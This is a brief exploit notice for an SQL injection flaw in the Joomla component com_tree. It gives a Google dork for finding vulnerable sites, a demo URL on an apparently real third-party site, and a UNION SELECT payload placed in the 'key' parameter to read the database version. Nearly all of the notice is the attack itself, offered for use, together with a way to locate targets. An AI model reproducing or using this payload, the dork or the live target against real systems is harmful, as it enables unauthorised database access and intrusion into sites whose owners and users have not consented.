################################################################################################ # Exploit Title: Joomla Component (com_tree) SQL Injection Vulnerability # # Author : CoBRa_21 # # E-Mail : ghost1lover[at]hotmail.com # # Google Dork : inurl:index.php?option=com_tree # # Demo: http://www.mistrhanky.com/hor/index.php?option=com_tree&Itemid=11&key=77 ################################################################################################ # # Exploit: # # http://127.0.0.1/index.php?option=com_tree&Itemid=11&key=77 (SQL) # # http://127.0.0.1/index.php?option=com_tree&Itemid=11&key=-77 uNIOn select 0,version(),2-- ################################################################################################ # Pentester CoBRa_21 Thanks e-banka.org & cyber-warrior.org & AKINCILAR # ################################################################################################